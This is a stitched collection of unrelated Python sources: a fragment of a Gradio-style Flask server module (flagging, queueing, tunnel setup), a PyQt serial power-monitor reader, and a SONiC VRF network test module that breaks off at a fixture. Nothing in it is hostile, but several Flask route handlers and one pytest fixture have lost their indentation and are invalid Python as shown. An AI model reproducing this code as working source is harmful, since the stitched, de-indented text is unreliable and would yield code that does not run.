    docstring; for outputs it is the last line of ``postprocess``'s.
    Each such line is expected to look like ``name (type): description``.
    Returns a (descriptions, type_names) pair of parallel lists.
    """
    docset = []
    types = []
    for cls in cls_set:
        if component == "input":
            line = inspect.getdoc(cls.preprocess).split("\n")[1]
        else:
            line = inspect.getdoc(cls.postprocess).split("\n")[-1]
        docset.append(line.split(":")[-1])
        types.append(line.split(")")[0].split("(")[-1])
    return docset, types
@app.route("/api/", methods=["GET"])
def api_docs():
inputs = [type(inp) for inp in app.interface.input_components]
outputs = [type(out) for out in app.interface.output_components]
input_types_doc, input_types = get_types(inputs, "input")
output_types_doc, output_types = get_types(outputs, "output")
input_names = [type(inp).__name__ for inp in app.interface.input_components]
output_names = [type(out).__name__ for out in app.interface.output_components]
sample_inputs = [inp.generate_sample() for inp in app.interface.input_components]
docs = {
"inputs": input_names,
"outputs": output_names,
"len_inputs": len(inputs),
"len_outputs": len(outputs),
"inputs_lower": [name.lower() for name in input_names],
"outputs_lower": [name.lower() for name in output_names],
"input_types": input_types,
"output_types": output_types,
"input_types_doc": input_types_doc,
"output_types_doc": output_types_doc,
"sample_inputs": sample_inputs
}
return render_template("api_docs.html", **docs)
def log_feature_analytics(feature):
    """Best-effort usage ping; skipped silently when analytics are off or offline."""
    if not app.interface.analytics_enabled:
        return
    try:
        requests.post(GRADIO_FEATURE_ANALYTICS_URL,
                      data={
                          'ip_address': IP_ADDRESS,
                          'feature': feature}, timeout=3)
    except (requests.ConnectionError, requests.exceptions.ReadTimeout):
        pass  # do not push analytics if no network
def flag_data(input_data, output_data, flag_option=None, flag_index=None, username=None, flag_path=None):
    """
    Append (or update) one flagged sample in the flagging log CSV.

    input_data/output_data: component values of one prediction.
    flag_option: optional label written to the 'flag' column.
    flag_index: when given, update the 'flag' cell of an existing row
        instead of appending a new row.
    username: optional value for the 'username' column.
    flag_path: directory of the log; defaults to the interface flagging dir.
    Returns the number of data rows (excluding the header) after the write.
    """
    if flag_path is None:
        flag_path = os.path.join(app.cwd, app.interface.flagging_dir)
    log_fp = "{}/log.csv".format(flag_path)
    encryption_key = app.interface.encryption_key if app.interface.encrypt else None
    is_new = not os.path.exists(log_fp)
    if flag_index is None:
        # Build the CSV row for a brand-new entry: one serialized cell per
        # input/output component, then optional flag/username plus timestamp.
        csv_data = []
        for i, interface in enumerate(app.interface.input_components):
            csv_data.append(interface.save_flagged(
                flag_path, app.interface.config["input_components"][i]["label"], input_data[i], encryption_key))
        for i, interface in enumerate(app.interface.output_components):
            csv_data.append(interface.save_flagged(
                flag_path, app.interface.config["output_components"][i]["label"], output_data[i], encryption_key) if output_data[i] is not None else "")
        if flag_option is not None:
            csv_data.append(flag_option)
        if username is not None:
            csv_data.append(username)
        csv_data.append(str(datetime.datetime.now()))
        if is_new:
            # Header row mirrors the cell layout built above.
            headers = [interface["label"]
                       for interface in app.interface.config["input_components"]]
            headers += [interface["label"]
                        for interface in app.interface.config["output_components"]]
            if app.interface.flagging_options is not None:
                headers.append("flag")
            if username is not None:
                headers.append("username")
            headers.append("timestamp")

    def replace_flag_at_index(file_content):
        # Rewrite the 'flag' cell of row `flag_index` in the CSV text
        # (closes over flag_index/flag_option from the enclosing call).
        file_content = io.StringIO(file_content)
        content = list(csv.reader(file_content))
        header = content[0]
        flag_col_index = header.index("flag")
        content[flag_index][flag_col_index] = flag_option
        output = io.StringIO()
        writer = csv.writer(output)
        writer.writerows(content)
        return output.getvalue()

    if app.interface.encrypt:
        # Encrypted log: decrypt the existing file into memory, apply the
        # append/update there, then write the whole file back encrypted.
        output = io.StringIO()
        if not is_new:
            with open(log_fp, "rb") as csvfile:
                encrypted_csv = csvfile.read()
            decrypted_csv = encryptor.decrypt(
                app.interface.encryption_key, encrypted_csv)
            file_content = decrypted_csv.decode()
            if flag_index is not None:
                file_content = replace_flag_at_index(file_content)
            output.write(file_content)
        writer = csv.writer(output)
        if flag_index is None:
            if is_new:
                writer.writerow(headers)
            writer.writerow(csv_data)
        with open(log_fp, "wb") as csvfile:
            csvfile.write(encryptor.encrypt(
                app.interface.encryption_key, output.getvalue().encode()))
    else:
        if flag_index is None:
            # Plain-text append (with header on first write).
            with open(log_fp, "a", newline="") as csvfile:
                writer = csv.writer(csvfile)
                if is_new:
                    writer.writerow(headers)
                writer.writerow(csv_data)
        else:
            # Plain-text in-place update of an existing row's flag.
            with open(log_fp) as csvfile:
                file_content = csvfile.read()
            file_content = replace_flag_at_index(file_content)
            with open(log_fp, "w", newline="") as csvfile:  # newline parameter needed for Windows
                csvfile.write(file_content)
    with open(log_fp, "r") as csvfile:
        line_count = len([None for row in csv.reader(csvfile)]) - 1
    return line_count
@app.route("/api/flag/", methods=["POST"])
@login_check
def flag():
log_feature_analytics('flag')
data = request.json['data']
flag_data(data['input_data'], data['output_data'], data.get("flag_option"), data.get("flag_index"),
current_user.id if current_user.is_authenticated else None)
return jsonify(success=True)
@app.route("/api/interpret/", methods=["POST"])
@login_check
def interpret():
log_feature_analytics('interpret')
raw_input = request.json["data"]
interpretation_scores, alternative_outputs = app.interface.interpret(
raw_input)
return jsonify({
"interpretation_scores": interpretation_scores,
"alternative_outputs": alternative_outputs
})
@app.route("/file/<path:path>", methods=["GET"])
@login_check
def file(path):
path = secure_filename(path)
if app.interface.encrypt and isinstance(app.interface.examples, str) and path.startswith(app.interface.examples):
with open(os.path.join(app.cwd, path), "rb") as encrypted_file:
encrypted_data = encrypted_file.read()
file_data = encryptor.decrypt(
app.interface.encryption_key, encrypted_data)
return send_file(io.BytesIO(file_data), attachment_filename=os.path.basename(path))
else:
return send_file(os.path.join(app.cwd, path))
@app.route("/api/queue/push/", methods=["POST"])
@login_check
def queue_push():
data = request.json["data"]
action = request.json["action"]
job_hash, queue_position = queue.push({"data": data}, action)
return {"hash": job_hash, "queue_position": queue_position}
@app.route("/api/queue/status/", methods=["POST"])
@login_check
def queue_status():
hash = request.json['hash']
status, data = queue.get_status(hash)
return {"status": status, "data": data}
def queue_thread(path_to_local_server, test_mode=False):
    """
    Worker loop: pop queued jobs and replay them against the local HTTP API.

    Runs forever (sleeping while the queue is empty) unless test_mode is
    set, in which case exactly one iteration is performed.
    """
    while True:
        try:
            next_job = queue.pop()
            if next_job is not None:
                # Shadowing the builtin `hash` is avoided on purpose.
                _, job_hash, input_data, task_type = next_job
                queue.start_job(job_hash)
                response = requests.post(
                    path_to_local_server + "/api/" + task_type + "/", json=input_data)
                if response.status_code == 200:
                    queue.pass_job(job_hash, response.json())
                else:
                    queue.fail_job(job_hash, response.text)
            else:
                time.sleep(1)
        except Exception:
            # BUG FIX: errors were previously swallowed silently, making queue
            # stalls impossible to diagnose. Keep the worker alive but log.
            traceback.print_exc()
            time.sleep(1)
        if test_mode:
            break
def start_server(interface, server_name, server_port, auth=None, ssl=None):
    """
    Configure the flask app for *interface* and launch it in a daemon thread.

    Returns (port, path_to_local_server, app, thread).
    Raises ValueError when queueing is combined with auth or encryption.
    """
    port = get_first_available_port(
        server_port, server_port + TRY_NUM_PORTS
    )
    path_to_local_server = "http://{}:{}/".format(server_name, port)
    if auth is not None:
        if not callable(auth):
            # List of (username, password) pairs -> dict for O(1) lookup.
            app.auth = {account[0]: account[1] for account in auth}
        else:
            app.auth = auth
    else:
        app.auth = None
    app.interface = interface
    app.cwd = os.getcwd()
    # Silence werkzeug's per-request logging.
    log = logging.getLogger('werkzeug')
    log.setLevel(logging.ERROR)
    if app.interface.enable_queue:
        if auth is not None or app.interface.encrypt:
            raise ValueError("Cannot queue with encryption or authentication enabled.")
        queue.init()
        # Background worker that replays queued jobs against this server.
        app.queue_thread = threading.Thread(target=queue_thread, args=(path_to_local_server,))
        app.queue_thread.start()
    if interface.save_to is not None:
        interface.save_to["port"] = port
    app_kwargs = {"port": port, "host": server_name}
    if ssl:
        app_kwargs["ssl_context"] = ssl
    # Run the flask app on a daemon thread so the caller keeps control.
    thread = threading.Thread(target=app.run,
                              kwargs=app_kwargs,
                              daemon=True)
    thread.start()
    return port, path_to_local_server, app, thread
def get_state():
    """Return the per-session state object (None when unset)."""
    return session.get("state")
def set_state(value):
    """Store *value* as the per-session state object."""
    session["state"] = value
def close_server(process):
    """Terminate the given server process and wait for it to exit."""
    process.terminate()
    process.join()
def url_request(url):
    """GET *url* with a JSON content-type header; wrap any failure in RuntimeError."""
    try:
        req = urllib.request.Request(
            url=url, headers={"content-type": "application/json"}
        )
        return urllib.request.urlopen(req, timeout=10)
    except Exception as e:
        raise RuntimeError(str(e))
def setup_tunnel(local_server_port, endpoint):
    """
    Request tunnel credentials from the Gradio API and open an SSH tunnel
    to the local server. Raises RuntimeError on any failure.
    """
    response = url_request(
        endpoint + '/v1/tunnel-request' if endpoint is not None else GRADIO_API_SERVER)
    # BUG FIX: a non-200 response previously fell off the end of the function
    # and returned None, which callers then treated as a share URL.
    if not (response and response.code == 200):
        raise RuntimeError("Could not get share link from Gradio API server.")
    try:
        payload = json.loads(response.read().decode("utf-8"))[0]
        return create_tunnel(payload, LOCALHOST_NAME, local_server_port)
    except Exception as e:
        raise RuntimeError(str(e))
def url_ok(url):
    """Poll *url* (up to 5 tries, 0.5 s apart) until it answers with an expected status."""
    try:
        for _ in range(5):
            time.sleep(.500)
            r = requests.head(url, timeout=3)
            if r.status_code in (200, 401, 302):  # 401 or 302 if auth is set
                return True
        # BUG FIX: previously fell off the loop and returned None implicitly;
        # callers expect a boolean.
        return False
    except (ConnectionError, requests.exceptions.ConnectionError):
        return False
|
powermonitor.py | import glob
from queue import Queue
import sys
import threading
import time
from PyQt5.QtCore import QObject, pyqtSignal
import serial
print("Power Monitor 0.1")
class PowerValue:
    """One sampled reading from the power monitor."""

    def __init__(self):
        # Measurement fields, zeroed until a sample line is decoded into them.
        self.busvoltage = 0
        self.current_ma = 0
        self.power = 0
        # Wall-clock timestamp of when this sample object was created.
        self.created = time.time()
class PowerMonitor(QObject):
    """
    Reads power samples from a serial-attached monitor on a background
    thread and publishes them through a Queue plus Qt signals.
    """
    # signals
    thread_started = pyqtSignal()
    thread_stopped = pyqtSignal()
    measurement_started = pyqtSignal()
    measurement_stopped = pyqtSignal()
    events_per_second = pyqtSignal(float)

    def __init__(self):
        QObject.__init__(self)
        self.ser = None                  # serial.Serial handle once startThread() opened a port
        self.data = Queue()              # decoded PowerValue samples for consumers
        self.running = False             # True while the reader thread is alive
        self.measurementRunning = False  # True between SACK and PACK acknowledgements
        self.countEvents = 0             # data lines seen in the current measurement

    def listPorts(self):
        """ Lists serial port names
        :raises EnvironmentError:
        On unsupported or unknown platforms
        :returns:
        A list of the serial ports available on the system
        """
        if sys.platform.startswith('win'):
            ports = ['COM%s' % (i + 1) for i in range(256)]
        elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
            # this excludes your current terminal "/dev/tty"
            ports = glob.glob('/dev/tty[A-Za-z]*')
        elif sys.platform.startswith('darwin'):
            ports = glob.glob('/dev/tty.*')
        else:
            raise EnvironmentError('Unsupported platform')
        result = []
        for port in ports:
            # Probe each candidate: only ports that can actually be opened
            # (and closed again) are reported as available.
            try:
                s = serial.Serial(port)
                s.close()
                result.append(port)
            except (OSError, serial.SerialException):
                pass
        return result

    def startThread(self, port):
        # Opens *port* at 115200 baud and starts the background reader thread.
        if (not self.ser == None):
            # end old connection if available
            self.ser.close()
        self.ser = serial.Serial(port, 115200, timeout=1)
        self.thread = threading.Thread(target=self.run_internal)
        self.thread.start()
        self.thread_started.emit()
        self.running = True

    def run_internal(self):
        # Reader loop: parses the monitor's line protocol until stopThread()
        # flips self.stop. Runs on the background thread started above.
        self.stop = False
        while (self.stop == False):
            buf = self.ser.readline()
            if len(buf) == 5:
                # Acknowledgement lines are 4 chars + newline; strip the newline.
                buf = buf[:4]
            # NOTE(review): decode() is attempted on every non-empty line,
            # including binary data lines -- presumably the device only emits
            # ASCII-safe bytes here; confirm against the firmware.
            if buf.decode('utf-8') == "SACK":
                # start acknowledged
                self.measurementRunning = True
                self.measurement_started.emit()
            elif buf.decode('utf-8') == "PACK":
                # stop acknowledged
                self.measurementRunning = False
                self.measurement_stopped.emit()
                # reset count for next measurement
                self.countEvents = 0
            elif len(buf) == 8 and buf[0] == 68:
                # if line is a data line (D = 68)
                if self.countEvents == 0:
                    start = time.time()
                self.countEvents += 1
                if self.countEvents % 1000 == 0:
                    # Emit a throughput estimate every 1000 events.
                    # NOTE(review): `start` is only bound on the first data
                    # line of a measurement -- assumes each measurement begins
                    # with countEvents == 0; verify.
                    diff = time.time() - start
                    eps = (self.countEvents / diff)
                    #print("eps: " + str(eps))
                    self.events_per_second.emit(eps)
                # Decode the 16-bit big-endian fields of the sample.
                pv = PowerValue()
                pv.busvoltage = ((buf[1] << 8) | (buf[2])) * 0.001
                pv.current_ma = ((buf[3] << 8) | (buf[4])) / 10
                pv.power = ((buf[5] << 8) | (buf[6]))
                #print("{} V, {} mA, {} W".format(pv.busvoltage, pv.current_ma, pv.power))
                self.data.put(pv)
            elif len(buf) > 0:
                # no data received, print it
                print(buf)
                # only count times after data has been received
                if self.countEvents > 0:
                    self.countEvents += 1
                pass
        # wait until all outgoing data is sent
        self.ser.flush()
        while self.ser.out_waiting > 0:
            pass
        self.thread_stopped.emit()
        self.running = False
        self.ser.close()

    def isThreadRunning(self):
        # True while the reader thread has not yet shut down.
        return self.running

    def stopThread(self):
        # Signal run_internal() to exit its loop after the current readline.
        self.stop = True

    def startMeasurement(self):
        # Ask the device to start streaming samples; it replies with "SACK".
        if self.isThreadRunning():
            print("start mes")
            self.ser.write('S'.encode('utf-8'))  # S
            self.ser.flush()

    def stopMeasurement(self):
        # Ask the device to stop streaming; it replies with "PACK".
        if self.isThreadRunning():
            print("stop mes")
            self.ser.write('P'.encode('utf-8'))  # P
            self.ser.flush()
            self.measurementRunning = False

    def isMeasurementRunning(self):
        # True between an acknowledged start ("SACK") and stop ("PACK").
        return self.measurementRunning
test_vrf.py | import sys
import time
import threading
import Queue
import yaml
import json
import random
import logging
import tempfile
import traceback
from collections import OrderedDict
from natsort import natsorted
from netaddr import IPNetwork
import pytest
from tests.common.fixtures.ptfhost_utils import copy_ptftests_directory # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import change_mac_addresses # lgtm[py/unused-import]
from tests.common.storage_backend.backend_utils import skip_test_module_over_backend_topologies # lgtm[py/unused-import]
from tests.ptf_runner import ptf_runner
from tests.common.utilities import wait_until
from tests.common.reboot import reboot
"""
During vrf testing, a vrf basic configuration need to be setup before any tests,
and cleanup after all tests. Both of the two tasks should be called only once.
A module-scoped fixture `setup_vrf` is added to accomplish the setup/cleanup tasks.
We want to use ansible_adhoc/tbinfo fixtures during the setup/cleanup stages, but
1. Injecting fixtures into xunit-style setup/teardown functions is not supported by
pytest as of [now](https://github.com/pytest-dev/pytest/issues/5289).
2. Calling a fixture function directly is deprecated.
So, we prefer a fixture rather than xunit-style setup/teardown functions.
"""
pytestmark = [
pytest.mark.topology('t0')
]
logger = logging.getLogger(__name__)
# global variables
g_vars = {}
PTF_TEST_PORT_MAP = '/root/ptf_test_port_map.json'
# helper functions
def get_vlan_members(vlan_name, cfg_facts):
    """Return the naturally sorted member ports of *vlan_name* from config facts."""
    members = []
    for key in cfg_facts['VLAN_MEMBER'].keys():
        vlan, port = key.split('|')
        if vlan == vlan_name:
            members.append(port)
    return natsorted(members)
def get_pc_members(portchannel_name, cfg_facts):
    """Return the naturally sorted member ports of *portchannel_name*."""
    members = []
    for key in cfg_facts['PORTCHANNEL_MEMBER'].keys():
        pc, port = key.split('|')
        if pc == portchannel_name:
            members.append(port)
    return natsorted(members)
def get_intf_ips(interface_name, cfg_facts):
    """
    Collect the IPv4/IPv6 addresses configured on *interface_name*.

    Returns {'ipv4': [IPNetwork, ...], 'ipv6': [IPNetwork, ...]}; both lists
    stay empty when the interface type is unknown or has no addresses.
    """
    prefix_to_intf_table_map = {
        'Vlan': 'VLAN_INTERFACE',
        'PortChannel': 'PORTCHANNEL_INTERFACE',
        'Ethernet': 'INTERFACE',
        'Loopback': 'LOOPBACK_INTERFACE'
    }
    intf_table_name = None
    ip_facts = {
        'ipv4': [],
        'ipv6': []
    }
    # BUG FIX: dict.iteritems() does not exist on Python 3; items() works on both.
    for pfx, t_name in prefix_to_intf_table_map.items():
        if pfx in interface_name:
            intf_table_name = t_name
            break
    if intf_table_name is None:
        return ip_facts
    for intf in cfg_facts[intf_table_name]:
        # Address rows look like "<name>|<ip/prefix>"; binding rows have no '|'.
        if '|' in intf:
            if_name, ip = intf.split('|')
            if if_name == interface_name:
                ip = IPNetwork(ip)
                if ip.version == 4:
                    ip_facts['ipv4'].append(ip)
                else:
                    ip_facts['ipv6'].append(ip)
    return ip_facts
def get_cfg_facts(duthost):
    """Fetch the DUT's running config_db contents and add a port-index map."""
    facts = json.loads(duthost.shell("sonic-cfggen -d --print-data")['stdout'])  # return config db contents(running-config)
    sorted_port_names = natsorted(facts['PORT'].keys())
    facts['config_port_indices'] = {name: idx for idx, name in enumerate(sorted_port_names)}
    return facts
def get_vrf_intfs(cfg_facts):
    """
    Map vrf name -> {interface name -> ip facts} for all vrf-bound interfaces.
    Keys containing '|' are address rows rather than bindings and are skipped.
    """
    intf_tables = ['INTERFACE', 'PORTCHANNEL_INTERFACE', 'VLAN_INTERFACE', 'LOOPBACK_INTERFACE']
    vrf_intfs = {}
    for table in intf_tables:
        # BUG FIX: dict.iteritems() does not exist on Python 3; items() works on both.
        for intf, attrs in cfg_facts.get(table, {}).items():
            if '|' not in intf:
                vrf = attrs['vrf_name']
                if vrf not in vrf_intfs:
                    vrf_intfs[vrf] = {}
                vrf_intfs[vrf][intf] = get_intf_ips(intf, cfg_facts)
    return vrf_intfs
def get_vrf_ports(cfg_facts):
    '''
    :return: vrf_intf_member_port_indices, vrf_member_port_indices
    '''
    # BUG FIX: on Python 3, dict views cannot be concatenated with '+';
    # materialize them as lists first (also correct on Python 2).
    vlan_member = list(cfg_facts['VLAN_MEMBER'].keys())
    pc_member = list(cfg_facts['PORTCHANNEL_MEMBER'].keys())
    member = vlan_member + pc_member
    vrf_intf_member_port_indices = {}
    vrf_member_port_indices = {}
    vrf_intfs = get_vrf_intfs(cfg_facts)
    # BUG FIX: iteritems() -> items() for Python 3 compatibility.
    for vrf, intfs in vrf_intfs.items():
        vrf_intf_member_port_indices[vrf] = {}
        vrf_member_port_indices[vrf] = []
        for intf in intfs:
            vrf_intf_member_port_indices[vrf][intf] = natsorted(
                [cfg_facts['config_port_indices'][m.split('|')[1]] for m in member if intf in m]
            )
            vrf_member_port_indices[vrf].extend(vrf_intf_member_port_indices[vrf][intf])
        vrf_member_port_indices[vrf] = natsorted(vrf_member_port_indices[vrf])
    return vrf_intf_member_port_indices, vrf_member_port_indices
def ex_ptf_runner(ptf_runner, exc_queue, **kwargs):
    '''
    Run ptf_runner(**kwargs); instead of letting an exception propagate out
    of a worker thread, push its sys.exc_info() triple onto exc_queue so
    the main thread can inspect failures later.
    Example:
        refer to test 'test_vrf_swss_warm_reboot'
    '''
    try:
        ptf_runner(**kwargs)
    except Exception:
        exc_queue.put(sys.exc_info())
def finalize_warmboot(duthost, comp_list=None, retry=30, interval=5):
    '''
    Check if componets finish warmboot (state 'reconciled').

    Polls WARM_RESTART_TABLE for up to retry * interval seconds and returns
    the list of components that did NOT reconcile (empty list on success).
    '''
    DEFAULT_COMPONENT_LIST = ['orchagent', 'neighsyncd']
    EXP_STATE = 'reconciled'
    comp_list = comp_list or DEFAULT_COMPONENT_LIST
    # wait up to $retry * $interval secs
    for _ in range(retry):
        # BUG FIX: iterate over a snapshot -- the original removed items from
        # comp_list while iterating it, which skips the element that follows
        # every removal.
        for comp in list(comp_list):
            state = duthost.shell('/usr/bin/redis-cli -n 6 hget "WARM_RESTART_TABLE|{}" state'.format(comp), module_ignore_errors=True)['stdout']
            logger.info("{} : {}".format(comp, state))
            if EXP_STATE == state:
                comp_list.remove(comp)
        if len(comp_list) == 0:
            break
        time.sleep(interval)
        logger.info("Slept {} seconds!".format(interval))
    return comp_list
def check_interface_status(duthost, up_ports):
    """Return True when every port in *up_ports* reports link up on the DUT."""
    facts = duthost.interface_facts(up_ports=up_ports)['ansible_facts']
    down_ports = facts['ansible_interface_link_down_ports']
    if len(down_ports) != 0:
        logger.info("Some ports went down: {} ...".format(down_ports))
        return False
    return True
def check_bgp_peer_state(duthost, vrf, peer_ip, expected_state):
    """Return True when the BGP session to *peer_ip* in *vrf* is in *expected_state*."""
    peer_info = json.loads(duthost.shell("vtysh -c 'show bgp vrf {} neighbors {} json'".format(vrf, peer_ip))['stdout'])
    logger.debug("Vrf {} bgp peer {} infos: {}".format(vrf, peer_ip, peer_info))
    try:
        peer_state = peer_info[peer_ip].get('bgpState', 'Unknown')
    except Exception:
        # Missing/odd structure in the vtysh output -> treat as unknown.
        peer_state = 'Unknown'
    if peer_state != expected_state:
        logger.info("Vrf {} bgp peer {} is {}, exptected {}!".format(vrf, peer_ip, peer_state, expected_state))
        return False
    return True
def check_bgp_facts(duthost, cfg_facts):
    """Return True when every configured BGP neighbor session is Established."""
    results = {}
    for neigh in cfg_facts['BGP_NEIGHBOR']:
        # Vrf-scoped neighbors are keyed "vrf|ip"; others live in 'default'.
        if '|' in neigh:
            vrf, peer_ip = neigh.split('|')
        else:
            vrf, peer_ip = 'default', neigh
        results[(vrf, peer_ip)] = check_bgp_peer_state(duthost, vrf, peer_ip, expected_state='Established')
    return all(results.values())
def setup_vrf_cfg(duthost, localhost, cfg_facts):
    '''
    setup vrf configuration on dut before test suite
    '''
    # FIXME
    # For vrf testing, we should create a new vrf topology
    # might named to be 't0-vrf', deploy with minigraph templates.
    #
    # But currently vrf related schema does not properly define in minigraph.
    # So we generate and deploy vrf basic configuration with a vrf jinja2 template,
    # later should move to minigraph or a better way(VRF and BGP cli).
    from copy import deepcopy
    cfg_t0 = deepcopy(cfg_facts)
    cfg_t0.pop('config_port_indices', None)
    # get members from Vlan1000, and move half of them to Vlan2000 in vrf basic cfg
    ports = get_vlan_members('Vlan1000', cfg_facts)
    # BUG FIX: use floor division -- len(ports)/2 is a float on Python 3 and
    # cannot be used as a slice index.
    half = len(ports) // 2
    vlan_ports = {'Vlan1000': ports[:half],
                  'Vlan2000': ports[half:]}
    extra_vars = {'cfg_t0': cfg_t0,
                  'vlan_ports': vlan_ports}
    duthost.host.options['variable_manager'].extra_vars.update(extra_vars)
    duthost.template(src="vrf/vrf_config_db.j2", dest="/tmp/config_db_vrf.json")
    duthost.shell("cp /tmp/config_db_vrf.json /etc/sonic/config_db.json")
    reboot(duthost, localhost)
def setup_vlan_peer(duthost, ptfhost, cfg_facts):
    '''
    setup vlan peer ip addresses on peer port(ptf).
    Example:
    vid       local-port  peer-port  peer-macvlan-dev  peer-namespace  peer-ip
    Vlan1000  Ethernet1   eth1       e1mv1             ns1000          192.168.0.2/21
                                                                       FC00:192::2/117
    Vlan2000  Ethernet13  eth13      e13mv1            ns2000          192.168.0.2/21
                                                                       FC00:192::2/117
    Returns (vlan_peer_ips, vlan_peer_vrf2ns_map).
    '''
    vlan_peer_ips = {}
    vlan_peer_vrf2ns_map = {}
    for vlan in cfg_facts['VLAN'].keys():
        # NOTE(review): str.strip('Vlan') strips a character set, not a prefix;
        # it works here because vlan ids are digits -- confirm if names change.
        ns = 'ns' + vlan.strip('Vlan')
        vrf = cfg_facts['VLAN_INTERFACE'][vlan]['vrf_name']
        vlan_peer_vrf2ns_map[vrf] = ns
        vlan_port = get_vlan_members(vlan, cfg_facts)[0]
        vlan_peer_port = cfg_facts['config_port_indices'][vlan_port]
        # deploy peer namespace on ptf
        ptfhost.shell("ip netns add {}".format(ns))
        # bind port to namespace
        ptfhost.shell("ip link add e{}mv1 link eth{} type macvlan mode bridge".format(vlan_peer_port, vlan_peer_port))
        ptfhost.shell("ip link set e{}mv1 netns {}".format(vlan_peer_port, ns))
        ptfhost.shell("ip netns exec {} ip link set dev e{}mv1 up".format(ns, vlan_peer_port))
        # setup peer ip on ptf
        if (vrf, vlan_peer_port) not in vlan_peer_ips:
            vlan_peer_ips[(vrf, vlan_peer_port)] = {'ipv4': [], 'ipv6': []}
        vlan_ips = get_intf_ips(vlan, cfg_facts)
        # BUG FIX: dict.iteritems() does not exist on Python 3; items() works on both.
        for ver, ips in vlan_ips.items():
            for ip in ips:
                neigh_ip = IPNetwork("{}/{}".format(ip.ip+1, ip.prefixlen))
                ptfhost.shell("ip netns exec {} ip address add {} dev e{}mv1".format(ns, neigh_ip, vlan_peer_port))
                # ping to trigger neigh resolving
                ping_cmd = 'ping' if neigh_ip.version == 4 else 'ping6'
                duthost.shell("{} -I {} {} -c 1 -f -W1".format(ping_cmd, vrf, neigh_ip.ip), module_ignore_errors=True)
                vlan_peer_ips[(vrf, vlan_peer_port)][ver].append(neigh_ip)
    return vlan_peer_ips, vlan_peer_vrf2ns_map
def cleanup_vlan_peer(ptfhost, vlan_peer_vrf2ns_map):
    """Delete the per-VLAN peer namespaces created by setup_vlan_peer."""
    # BUG FIX: dict.iteritems() does not exist on Python 3; items() works on both.
    for vrf, ns in vlan_peer_vrf2ns_map.items():
        ptfhost.shell("ip netns del {}".format(ns))
def gen_vrf_fib_file(vrf, tbinfo, ptfhost, render_file, dst_intfs=None,
                     limited_podset_number=10, limited_tor_number=10):
    """Render the vrf_fib ptf configuration for *vrf* onto the ptf host."""
    if not dst_intfs:
        # Fall back to the vrf's default PortChannel destinations.
        dst_intfs = get_default_vrf_fib_dst_intfs(vrf, tbinfo)
    extra_vars = {
        'testbed_type': tbinfo['topo']['name'],
        'props': g_vars['props'],
        'intf_member_indices': g_vars['vrf_intf_member_port_indices'][vrf],
        'dst_intfs': dst_intfs,
        'limited_podset_number': limited_podset_number,
        'limited_tor_number': limited_tor_number
    }
    ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
    ptfhost.template(src="vrf/vrf_fib.j2", dest=render_file)
def get_default_vrf_fib_dst_intfs(vrf, tbinfo):
    '''
    Get default vrf fib destination interfaces(PortChannels) according to the given vrf.
    The test configuration is dynamic and can work with 4 and 8 PCs as the number of VMs.
    The first half of PCs are related to Vrf1 and the second to Vrf2.
    '''
    vms_num = len(tbinfo['topo']['properties']['topology']['VMs'])
    half = int(vms_num / 2)
    if vrf == 'Vrf1':
        indices = range(1, half + 1)
    else:
        indices = range(half + 1, vms_num + 1)
    return ['PortChannel000{}'.format(i) for i in indices]
def gen_vrf_neigh_file(vrf, ptfhost, render_file):
    """Render the vrf_neigh ptf configuration for *vrf* onto the ptf host."""
    extra_vars = {
        'intf_member_indices': g_vars['vrf_intf_member_port_indices'][vrf],
        'intf_ips': g_vars['vrf_intfs'][vrf]
    }
    ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
    ptfhost.template(src="vrf/vrf_neigh.j2", dest=render_file)
def gen_specific_neigh_file(dst_ips, dst_ports, render_file, ptfhost):
    """
    Write a neighbor file mapping each destination ip to the flattened list
    of ptf port indices, then copy it to *render_file* on the ptf host.
    """
    flat_ports = [str(port) for port_list in dst_ports for port in port_list]
    # BUG FIX: NamedTemporaryFile defaults to binary mode ('w+b'), so writing
    # str here raised TypeError on Python 3; open it in text mode instead.
    tmp_file = tempfile.NamedTemporaryFile(mode='w')
    for ip in dst_ips:
        tmp_file.write('{} [{}]\n'.format(ip, ' '.join(flat_ports)))
    tmp_file.flush()
    ptfhost.copy(src=tmp_file.name, dest=render_file)
# For dualtor
def get_dut_enabled_ptf_ports(tbinfo, hostname):
    """Return the ptf port indices attached to *hostname*, minus disabled ones."""
    dut_index = str(tbinfo['duts_map'][hostname])
    enabled = set(tbinfo['topo']['ptf_map'][dut_index].values())
    disabled = set()
    if dut_index in tbinfo['topo']['ptf_map_disabled']:
        disabled = set(tbinfo['topo']['ptf_map_disabled'][dut_index].values())
    return enabled - disabled
# For dualtor
def get_dut_vlan_ptf_ports(mg_facts):
    """Return the set of ptf port indices that are VLAN members on the DUT."""
    return {
        mg_facts['minigraph_port_indices'][member]
        for vlan in mg_facts['minigraph_vlans']
        for member in mg_facts['minigraph_vlans'][vlan]['members']
    }
# fixtures
@pytest.fixture(scope="module")
def dut_facts(duthosts, rand_one_dut_hostname):
    """Module-scoped ansible facts of the randomly selected DUT."""
    return duthosts[rand_one_dut_hostname].facts
@pytest.fixture(scope="module")
def cfg_facts(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
return get_cfg_facts(duthost)
def restore_config_db(localhost, duthost, ptfhost):
    """Restore the backed-up config_db.json, reboot the DUT, and clean up ptf namespaces."""
    # In case something went wrong in previous reboot, wait until the DUT is accessible to ensure that
    # the `mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json` is executed on DUT.
    # If the DUT is still inaccessible after timeout, we may have already lose the DUT. Something sad happened.
    localhost.wait_for(host=g_vars["dut_ip"],
                       port=22,
                       state='started',
                       search_regex='OpenSSH_[\\w\\.]+ Debian',
                       timeout=180)  # Similiar approach to increase the chance that the next line get executed.
    duthost.shell("mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json")
    reboot(duthost, localhost)
    # Only tear down peer namespaces when setup actually created them.
    if 'vlan_peer_vrf2ns_map' in g_vars:
        cleanup_vlan_peer(ptfhost, g_vars['vlan_peer_vrf2ns_map'])
@pytest.fixture(scope="module", autouse=True)
def setup_vrf(tbinfo, duthosts, rand_one_dut_hostname, ptfhost, localhost, skip_test_module_over_backend_topologies):
    """Module-wide setup: reconfigure the DUT from t0 to a VRF topology.

    Backs up config_db.json, applies the VRF configuration, sets up the VLAN
    peers on the PTF host and fills the module-global g_vars with data used by
    the test cases. config_db.json is restored (with a reboot) on teardown, or
    immediately if any setup step raises.
    """
